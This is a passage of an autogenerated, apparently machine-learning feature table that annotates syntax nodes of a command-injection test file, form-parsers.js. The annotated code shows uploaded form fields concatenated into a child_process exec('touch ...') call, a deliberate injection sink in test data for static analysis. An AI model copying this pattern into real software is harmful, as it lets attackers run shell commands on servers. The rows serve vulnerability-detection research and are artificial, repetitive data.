autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:12 | form.parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:12 | form.parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:12 | form.parse | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:12 | form.parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:52:12 | form.parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | exceptional return of form.pa ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | exceptional return of form.pa ... OK\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | exceptional return of form.pa ... OK\\n }) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | exceptional return of form.pa ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | exceptional return of form.pa ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:3:54:4 | form.pa ... OK\\n }) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:8:52:12 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:8:52:12 | parse | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:8:52:12 | parse | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:8:52:12 | parse | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:8:52:12 | parse | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | CalleeFlexibleAccessPath | form.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | calleeImports | multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:14:52:16 | req | receiverName | form | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | exec | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | this | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | this | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:52:18 | this | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | 'arguments' object of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | 'arguments' object of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | exceptional return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | exceptional return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | CalleeFlexibleAccessPath | form.parse | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | calleeImports | multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | functio ... OK\\n } | receiverName | form | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | return of anonymous function | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:19:54:3 | return of anonymous function | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:29:52:31 | err | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:29:52:31 | err | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:29:52:31 | err | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:29:52:31 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:29:52:31 | err | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:34:52:39 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:42:52:46 | files | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:42:52:46 | files | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:42:52:46 | files | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:42:52:46 | files | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:52:42:52:46 | files | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:8 | exec | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:8 | exec | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:8 | exec | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:8 | exec | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exceptional return of exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exceptional return of exec("t ... s.name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exceptional return of exec("t ... s.name) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exceptional return of exec("t ... s.name) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exceptional return of exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:5:53:32 | exec("t ... s.name) | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:17 | "touch " | stringConcatenatedWith | -endpoint- fields.name | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:10:53:31 | "touch ... ds.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:26 | fields | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:26 | fields | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:26 | fields | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:26 | fields | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:26 | fields | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:21:53:31 | fields.name | stringConcatenatedWith | 'touch ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:28:53:31 | name | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:28:53:31 | name | contextSurroundingFunctionParameters | (req, res)\n(err, fields, files) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:28:53:31 | name | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:28:53:31 | name | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:53:28:53:31 | name | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:11 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:11 | form2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:11 | form2 | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:11 | form2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:11 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 = ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 = ... .Form() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 = ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 = ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:7:57:35 | form2 = ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | exceptional return of new mul ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | exceptional return of new mul ... .Form() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | exceptional return of new mul ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | exceptional return of new mul ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | exceptional return of new mul ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | new mul ... .Form() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | new mul ... .Form() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | new mul ... .Form() | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | new mul ... .Form() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:15:57:35 | new mul ... .Form() | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:28 | multiparty | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:28 | multiparty | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:28 | multiparty | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:28 | multiparty | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:28 | multiparty | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:33 | multiparty.Form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:33 | multiparty.Form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:33 | multiparty.Form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:33 | multiparty.Form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:19:57:33 | multiparty.Form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:30:57:33 | Form | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:30:57:33 | Form | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:30:57:33 | Form | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:30:57:33 | Form | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:57:30:57:33 | Form | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:7 | form2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:7 | form2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:7 | form2 | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:7 | form2 | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:7 | form2 | fileImports | busboy child_process express formidable http multer multiparty | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:10 | form2.on | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:10 | form2.on | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/form-parsers.js:58:3:58:10 | form2.on | enclosingFunctionBody | req res form multiparty Form form parse req err fields files exec touch fields name form2 multiparty Form form2 on part part exec touch part filename form2 parse req | +| 